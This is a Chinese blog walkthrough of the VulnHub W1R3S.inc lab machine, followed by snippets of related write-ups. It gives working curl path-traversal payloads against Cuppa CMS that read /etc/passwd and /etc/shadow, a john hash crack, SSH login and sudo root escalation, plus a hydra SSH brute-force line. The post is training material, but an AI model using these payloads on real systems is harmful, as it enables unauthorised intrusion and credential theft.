Vulnhub靶机 W1R3S.inc(渗透测试详解)

最新推荐文章于 2024-11-24 16:05:18 发布
最新推荐文章于 2024-11-24 16:05:18 发布
阅读量497 收藏 8
点赞数 5
文章标签: 服务器 linux 网络 web安全 安全性测试 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_78721909/article/details/140893744
版权

一、靶机配置

1、靶机下载地址

https://www.vulnhub.com/entry/w1r3s-101,220/

2、修改靶机网卡

 二、web渗透测试

1、靶机IP扫描

2、靶机IP、端口服务版本扫描

nmap -sS -sV -A -p- 192.168.31.144

发现有ftp的21端口,并且允许匿名用户登录anonymous ,接着就是ssh的22端口,80端口和mysql的3306端口,并且3306端口并不是管理员端口

3、访问靶机主页

4、对靶机进行目录探测

发现了/administrator/index.php,/wordpress/wp-login.php这俩目录

4、拼接访问

拼接/wordpress/wp-login.php,是个登录框

拼接/administrator/installation/

并且是个Cuppa CMS

4、使用whatweb扫描该网址信息

发现网站是Apache2.4.18,Cuppa CMS 搭建的

4、使用searchsploit命令查询Cuppa cms是否存在漏洞

searchsploit cuppa cms

发现一处漏洞,将它下载下来

searchsploit cuppa cms -m 25971.txt

查看25971文件

查看漏洞详情得知, 该cms可通过文件包含漏洞读取任意文件, 我们选取其中一个payload

4、文件包含漏洞读取任意文件

这里我直接访问/etc/passwd

http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

发现访问不到

5、可能是需要post访问,使用curl工具以post方式获取信息

curl -X POST -d urlConfig=../../../../../../../../../etc/passwd http://192.168.31.144/administrator/alerts/alertConfigField.php

成功获取到/etc/passwd内容

发现了w1r3s的用户和root有/bin/bash权限

6、查看/etc/shadow文件,获取密码信息

 curl -s  --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.31.144/administrator/alerts/alertConfigField.php

发现有www-data和w1r3s的加密过的密码,因为只有w1r3s用户有权限,所以主要拿w1r3s的密码来爆破,这里使用kali自带的john工具爆破解密,先将用户和加密的密码复制到一个文本,再爆破

vi 1.txt
john 1.txt

得到密码为computer

7、前面扫描端口,知道22端口开发,尝试连接

ssh w1r3s@192.168.31.144

成功连接

三、提权

1、输入sudo -l 查看此用户权限

发现该用户是全权限

2、直接sudo su 获取root权限

提权成功!!!

芜丶湖
关注
W1R3S.v1.0.1靶机渗透测试
weixin_58786230的博客
08-05 495
【代码】W1R3S.v1.0.1靶机渗透测试
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(三)w1r3s-101
hyjcking的博客
11-24 1398
在游览器中输入上面的url,页面没有回显,但是可以肯定的是这个php文件是存在的,可能是因为这个网站的cms经过二次开发导致目录结构发生改变,所以无法访问通,所以我打算使用curl对参数urlconfig进行urlencode编码。接下来我们只需要破解这段密文即可,把拥有密码的几个用户全部保存到pass.txt文档上(在桌面创建一个),然后命令:john pass.txt跑出密码。接下来的步骤就很明朗了,直接去百度上搜cuppa cms的漏洞,找到漏洞编号。开启靶机之后先扫了一下内网IP找到靶机的IP。
vulnhub/W1R3S.inc
qq_45230030的博客
05-09 464
五一加调休在家躺尸真舒服,咸鱼生活真美啊,可惜结束的太快,啊,继续打靶下载地址:https://github.com/rishabhkant07/Privilege-Escalation-Cheatsheet-Vulnhub-其中也附有相应的WP,也是有很多种方法,怎么方便怎么来吧。下载完靶机,更改网络为NAT模式,与攻击机设置为同一网卡模式。攻击机(kali)IP:192.168.59.143
靶机精讲之 W1R3S
m0_63285023的博客
04-04 622
New FTP Server For W1R3S.inc 记到笔记上(文本上因为到时候要用到)anonymous匿名登录,如果可以匿名登录则说明是没有密码的。查看文件2的编码形式 指令:hash-indentifier。-sT 说明用tcp协议(三次握手)扫描。把这段码保存下来(破解),像hash码。21,23,80,3306端口 +ip。把cuppa去掉,试一下,存在登录界面。zh注册尝试一下,有可能有注入漏洞。扫描到的目录要一个个查看(大致)可能存在编码问题(被包含文件)
靶机渗透】w1r3s.v1.0.1靶机渗透练习
serendipity1130的博客
08-30 726
靶机描述:您受雇在W1R3S.inc个人服务器上进行渗透测试并报告所有结果。他们要求您获得root访问权限并找到标志(位于/root目录中) 1.主机发现:arp-scan -l,发现靶机ip为192.168.225.142 2.扫描端口 nmap 192.168.225.142 -sV -sC -Pn -n -v -T5 -p- 3.使用gobuster扫到后台路径: gobuster dir -u http://192.168.225.154/ -w /usr/share/wordl.
w1r3s--靶机实操详解
qq_61802750的博客
08-05 1039
把localhost指向我们的kali,再做一个实验,也许localhost不允许指定非本机ip,指向靶机ip可能不行,所以我们再创建一个域名来进行访问。看到已经列出了passwd的内容,每一条用户数据的第二段都是X,证明密码是以哈希的方式存在了shadow文件中,我们去找shadow文件。下面的字符,我们通过观察可以发现,它是上下颠倒加上前后倒序,kali里没有工具可以解密,我们可以百度进行查询。如果创建的域名可以访问的话,而localhost不行,那就是现在kali的环境不允许这样操作了。
红队渗透靶场之W1R3S靶场(超详细!)
xf555er的博客
11-24 3825
- nmap的基本使用 - 目录爆破工具的使用 - CMS漏洞的利用 - Linux用户的简单提权
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
【每日打靶练习】靶机渗透实操-W1R3S(易)
leo788的博客
12-29 1317
试试读一下/etc/shadow文件,该文件存放用户名密码,得到了很像密码的两部分信息,分别对应着www-data用户-加密密码,w1r3s用户-加密密码,使用最小速率为10000来扫描靶机ip开放端口,端口数量为65536个,所以设置10000的速率来进行扫描,其默认是tcp扫描。对页面上的信息cuppa cms进行匹配,获取到一条信息xxx.txt,检查一下,发现cuppa cms这个存在文件包含漏洞。开放端口有:21-ftp,22-ssh,80-http,3306-mysql。
红队笔记-1:W1R3S: 1.0.1打靶流程(vulnhub
qq_63442530的博客
03-13 1556
1.主机发现&端口扫描:主机发现目标主机ip:192.168.254.141,发现存活端口:21(tcp)22(ssh) ,80(http)3306(mysql)
W1R3S靶机全通详细教程
observer的博客
07-30 1547
W1R3S靶机全通详细教程
w1r3s靶场-nmap扫描与分析 ftp渗透 与 ssh提权
XYpangSJ的博客
03-03 1738
UDP(用户数据报协议) 是一种传输层协议,它属于无连接的传输类型,这意味着它不保证数据包的顺序或数据的完整性。UDP主要用于支持那些需要在计算机之间传输数据的网络应用,如网络视频会议系统等客户/服务器模式的网络应用。与TCP(传输控制协议)相比,UDP提供了简单的数据传输服务,但不提供数据包分组、组装和排序功能,因此无法确保数据包的安全完整到达。IETF RFC 768是UDP的正式规范。参数-sU:指定以udp协议进行扫描参数--top-ports 20:最常用的20个udp端口。
W1R3S打靶记录--附nmap详细说明
weixin_58815063的博客
07-12 298
1.nmap获得四个端口21,22,80,3306都是标准的服务端口,但在nmap扫描过程中我们详细的对获得数据进行取舍、利用,在渗透以及实际攻防的过程中,怎么使用,怎么选择。也不要忽略udp、ipv6、对四个端口的优先级排序1.21端口ftp,里面获得了若干的文本文件,逐一查看、破解、处理,虽然此次靶机并没有什么用,但在过程中这是必不可缺的,在若干信息中突围,选择取舍,这才是必要的。2.3306端口mysql,尝试登录为禁止连接状态。
W1R3S - VulnHub(漏洞靶机渗透测试
Start C的博客
12-05 1185
VulnHub靶机学习 - W1R3S
【学渗透靶机——W1R3S】
jieli0901227的博客
04-02 482
02.txt 中第2个字符串可能是base64,使用工具进行解密,也没有效信息。(1)通过searchsploit cuppa cms 发现有可利用的漏洞。这里发现没有可以直接利用的漏洞,接下来对每个端口对应的服务进行测试。没有显示passwd , 查看25971 ,需要对参数值进行编码,浏览目录发现.txt 文件 ,通过mget 下载下来。02.txt 中第1个字符串可能是MD5。这里我们使用nmap确定靶机的ip地址。使用sudo 运行bash 进行提权。通过在线工具进行翻转。FTP渗透可能性不大。
红队笔记--W1R3S、JARBAS、SickOS、Prime打靶练习记录
2301_79469341的博客
11-24 1326
80端口是一个CMS,8080端口是一个管理端登录页面,还发现一个robots.txt协议,robots.txt协议中说不希望机器人点击"build"按钮。扫描wordpress/wp-login.php目录和/administrator/installation/目录。出现了下面这个,意思是凭据被安全地加密了。扫描得到secret.txt文件,内容如下:要对每个php文件进行fuzz测试,如果得到参数,进行下一步。由于前面是扫描目录,不会扫描出文件,使用dirb加参数扫描.zip或.txt类型的文件。
w1r3s 靶机学习
m0_63416413的博客
04-09 1368
w1r3s靶机学习,随手记录,参照B站RedTeamNotes的视频学习,红笔老登🤤
vulnhub靶机jan
最新发布
12-27
### 关于 VulnHub 平台上的 Jan 靶机 #### 环境准备 对于渗透测试环境的选择,通常会采用 Kali Linux 作为攻击平台。Kali 是一款专门为渗透测试设计的操作系统,内置了大量的安全工具[^2]。 #### 初始信息收集 针对任何靶机的第一步都是进行全面的信息收集。这包括但不限于网络扫描、服务识别和服务版本检测。可以利用 `nmap` 进行初步的端口扫描和操作系统指纹识别: ```bash nmap -A <target_ip> ``` #### Web 应用分析 许多靶机会提供 web 接口供玩家探索。此时应该仔细审查网页源代码并尝试发现隐藏文件夹或路径。如果遇到 base64 编码的内容,则可能需要对其进行解码来揭示潜在线索[^1]。 #### 用户认证绕过与暴力破解 当面对受保护资源时,考虑是否存在弱密码或其他形式的身份验证缺陷。Hydra 工具能够帮助执行字典攻击以猜测常见用户名/密码组合: ```bash hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://<target_ip> ``` #### 权限提升技巧 一旦获得低权限 shell 访问后,下一步就是寻找方法提高当前用户的访问级别。LXD 容器逃逸是一种常见的提权手段,在某些情况下可能会被利用。 尽管上述内容提供了通用性的指导方针,但对于特定名称为 "Jan" 的 VulnHub 靶机的具体细节并未提及。建议查阅官方文档或者社区贡献者分享的相关 Walkthrough 文章获取更精确的帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值